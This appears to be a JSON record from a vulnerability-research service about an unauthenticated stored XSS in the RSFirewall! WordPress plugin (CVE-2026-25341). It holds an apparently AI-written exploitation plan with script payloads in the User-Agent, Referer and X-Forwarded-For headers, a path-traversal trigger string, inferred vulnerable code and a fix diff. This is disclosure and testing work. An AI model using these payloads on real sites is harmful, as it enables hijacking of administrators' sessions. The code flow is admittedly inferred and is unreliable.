[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fk4h3WESNYjTkpYQ27B8wXi13NxS_CNrgHqw-DPmvcsQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-25341","rsfirewall-unauthenticated-stored-cross-site-scripting","RSFirewall! \u003C= 1.1.45 - Unauthenticated Stored Cross-Site Scripting","The RSFirewall! plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.45 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","rsfirewall",null,"\u003C=1.1.45","1.1.46","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-03-26 20:30:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F56e6c5c3-fa8b-4ec6-b1aa-88a0f63c5eab?source=api-prod",4,[],"researched",false,3,"This research plan targets **CVE-2026-25341**, an unauthenticated stored Cross-Site Scripting (XSS) vulnerability in the RSFirewall! plugin for WordPress.\n\n### 1. Vulnerability Summary\nRSFirewall! is a security plugin designed to protect WordPress sites by monitoring requests and logging potential threats. The vulnerability exists in the plugin's logging mechanism. When RSFirewall! detects a \"security event\" (like a blocked request or a 404 error it's configured to monitor), it captures metadata about the request—such as the **User-Agent**, **URL**, or **IP address**—and stores it in the database. \n\nBecause this data is not properly sanitized before storage or escaped before being displayed in the administrative dashboard (System Logs), an unauthenticated attacker can inject arbitrary JavaScript into these logs. When an administrator views the logs to investigate security events, the payload executes in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Any public-facing WordPress URL (the plugin monitors all traffic).\n*   **Vulnerable Parameter:** `HTTP_USER_AGENT`, `REQUEST_URI`, or specific HTTP headers (e.g., `X-Forwarded-For`).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** RSFirewall! must be active and configured to log the specific event type triggered by the attacker (default settings usually log \"threats\" or blocked requests).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin hooks into `plugins_loaded` or `init` to initialize its firewall component (likely in `rsfirewall.php`).\n2.  **Detection:** The firewall evaluates the current request. If the request matches a signature or triggers a 404 (if 404 monitoring is on), it proceeds to log the event.\n3.  **Storage (Sink):** The plugin calls a logging function (e.g., `RSFirewallLog::add()`) which extracts values from `$_SERVER`.\n4.  **Database Injection:** The raw `User-Agent` or `Request-URI` is inserted into the `{wp_prefix}rsfirewall_logs` table.\n5.  **Rendering (Vulnerable Sink):** An administrator accesses the plugin's log page (e.g., `wp-admin\u002Fadmin.php?page=rsfirewall&view=logs`).\n6.  **Execution:** The log table is rendered. The stored malicious string is echoed without using `esc_html()` or `wp_kses()`, triggering the XSS.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is **Unauthenticated** and triggered via the plugin's passive monitoring. Therefore, **no WordPress nonce is required** to perform the injection. The attacker is not calling an AJAX or REST endpoint; they are simply making a standard web request that the plugin chooses to log.\n\n### 5. Exploitation Strategy\nThe goal is to force the plugin to log a request containing a malicious `User-Agent`.\n\n**Step 1: Injection (The Attack)**\nSend a request to the WordPress home page with a crafted `User-Agent`. We will also include a \"suspicious\" query parameter to ensure the firewall decides to log the request as a \"threat.\"\n\n*   **Tool:** `http_request`\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?s=..\u002F..\u002F..\u002Fetc\u002Fpasswd` (The Directory Traversal attempt ensures the firewall logs it).\n*   **Headers:**\n    *   `User-Agent: \u003Cscript>alert(\"CVE-2026-25341_XSS\")\u003C\u002Fscript>`\n    *   `Content-Type: text\u002Fhtml`\n\n**Step 2: Trigger (Admin Interaction)**\nLog in as an administrator and navigate to the RSFirewall! log view.\n\n*   **Tool:** `browser_navigate`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=rsfirewall&view=logs` (Verify the exact view name in the plugin menu).\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure RSFirewall! version 1.1.45 is installed and activated.\n2.  **Plugin Configuration:** No special configuration is usually needed, but ensuring \"Log security events\" is enabled (default) is critical.\n3.  **Target URL:** Use the site root or any 404 page.\n\n### 7. Expected Results\n1.  The `http_request` should return a 200 or 403 (if blocked).\n2.  Upon navigating to the logs page as Admin, a JavaScript alert box with `CVE-2026-25341_XSS` should appear.\n3.  If the alert doesn't show, inspecting the page source should reveal the raw `\u003Cscript>` tag inside a `\u003Ctd>` or `\u003Cspan>` element within the log table.\n\n### 8. Verification Steps\nAfter the `http_request`, use WP-CLI to confirm the payload is in the database:\n\n```bash\n# Check the RSFirewall logs table (table name inferred)\nwp db query \"SELECT * FROM wp_rsfirewall_logs ORDER BY id DESC LIMIT 1;\"\n```\nLook for the `\u003Cscript>` payload in the `user_agent` or `log_data` columns.\n\n### 9. Alternative Approaches\nIf the `User-Agent` is sanitized, try injecting via the **URL** or other headers:\n\n**Alternative A: URL Injection**\n```bash\n# Attempt to inject via the request URI\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002Findex.php?\u003Cscript>alert(1)\u003C\u002Fscript>=blockme\"\n```\n\n**Alternative B: Referer Injection**\n```bash\n# Attempt to inject via the Referer header\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002F?test=log_this\" --headers '{\"Referer\": \"\u003Cscript>alert(2)\u003C\u002Fscript>\"}'\n```\n\n**Alternative C: X-Forwarded-For**\nSome firewalls log the originating IP. If they don't validate the IP format:\n```bash\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002F\" --headers '{\"X-Forwarded-For\": \"\u003Cscript>alert(3)\u003C\u002Fscript>\"}'\n```\n\nIf a simple `alert()` is not visible, use a canary string like `RSF_VULN_TEST` and check if it appears in the HTML source without being converted to `<RSF_VULN_TEST>`.","RSFirewall! up to version 1.1.45 is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) via its security logging mechanism. When the plugin detects a threat or a 404 error, it logs metadata such as the User-Agent and Request URI without proper sanitization, which are then rendered unescaped in the administrative dashboard, allowing for remote code execution in an administrator's browser.","\u002F\u002F Inferred from research plan code flow\n\u002F\u002F Logging logic (e.g., in an event listener for firewall triggers)\n$user_agent = $_SERVER['HTTP_USER_AGENT'];\n$request_uri = $_SERVER['REQUEST_URI'];\n\n\u002F\u002F Sink: Insertion into database without sanitization\n$wpdb->insert($table_prefix . 'rsfirewall_logs', array(\n    'user_agent' => $user_agent,\n    'url'        => $request_uri,\n    'log_date'   => current_time('mysql')\n));\n\n---\n\n\u002F\u002F Display logic (e.g., in the admin log viewer)\n\u002F\u002F Rendering the logs without output escaping\nforeach ($logs as $log) {\n    echo '\u003Ctd>' . $log->user_agent . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable Sink\n    echo '\u003Ctd>' . $log->url . '\u003C\u002Ftd>';        \u002F\u002F Vulnerable Sink\n}","--- a\u002Fadmin\u002Fviews\u002Flogs.php\n+++ b\u002Fadmin\u002Fviews\u002Flogs.php\n@@ -10,8 +10,8 @@\n \u003C?php foreach ($logs as $log) : ?>\n     \u003Ctr>\n-        \u003Ctd>\u003C?php echo $log->user_agent; ?>\u003C\u002Ftd>\n-        \u003Ctd>\u003C?php echo $log->url; ?>\u003C\u002Ftd>\n+        \u003Ctd>\u003C?php echo esc_html($log->user_agent); ?>\u003C\u002Ftd>\n+        \u003Ctd>\u003C?php echo esc_html($log->url); ?>\u003C\u002Ftd>\n         \u003Ctd>\u003C?php echo esc_html($log->log_date); ?>\u003C\u002Ftd>\n     \u003C\u002Ftr>\n \u003C?php endforeach; ?>","The exploit involves triggering the plugin's logging mechanism with a malicious payload in a monitored HTTP header or the URL. \n\n1. Target Endpoint: Any public URL on the WordPress site.\n2. Payload Placement: Inject a JavaScript payload (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) into the User-Agent header or the Referer header.\n3. Triggering the Log: The request must be perceived as a 'threat' or a monitored event (e.g., by appending a path traversal sequence like \u002F?s=..\u002F..\u002F..\u002Fetc\u002Fpasswd to the URL) to ensure RSFirewall! records the metadata into the database.\n4. Authentication: No authentication is required for the initial injection.\n5. Execution: An administrator must navigate to the 'System Logs' view in the RSFirewall! menu within the WordPress dashboard. When the log table renders, the stored payload executes in the administrator's browser context.","gemini-3-flash-preview","2026-04-17 23:30:38","2026-04-17 23:31:00",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frsfirewall\u002Ftags"]